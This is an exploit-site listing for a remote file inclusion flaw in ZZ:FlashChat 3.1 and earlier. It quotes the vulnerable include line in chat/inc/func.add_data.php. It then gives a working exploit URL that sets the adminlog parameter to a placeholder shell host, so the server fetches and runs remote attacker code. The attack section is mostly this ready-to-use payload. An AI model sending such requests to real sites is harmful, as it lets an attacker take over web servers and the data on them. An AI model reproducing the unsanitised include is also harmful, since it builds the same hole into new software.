[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability

Author
SHiKaA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-722
Category
web applications
Date add
18-08-2006
Platform
unsorted
===============================================================
ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability
===============================================================




#==============================================================================================
#ZZ:FlashChat <= V3.1 (adminlog) Remote File Inclusion Exploit
#===============================================================================================
#                                                                            
#Critical Level : Dangerous                                                                                                                                 
#                                                                             
#Version : V3.1                                                  
#                                                               
#
#================================================================================================
#
#Bug in : chat/inc/func.add_data.php
#
#Vlu Code :
#--------------------------------
#
#  if($cfg['autolink']==1){	
#		include($adminlog.'./inc/func.autolink.php'); 
#  }
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/chat/inc/func.add_data.php?cfg[autolink]=1&adminlog=http://SHELLURL.COM?
#
#
#================================================================================================
#Discoverd By : SHiKaA
==================================================================================================




#  0day.today [2024-12-24]  #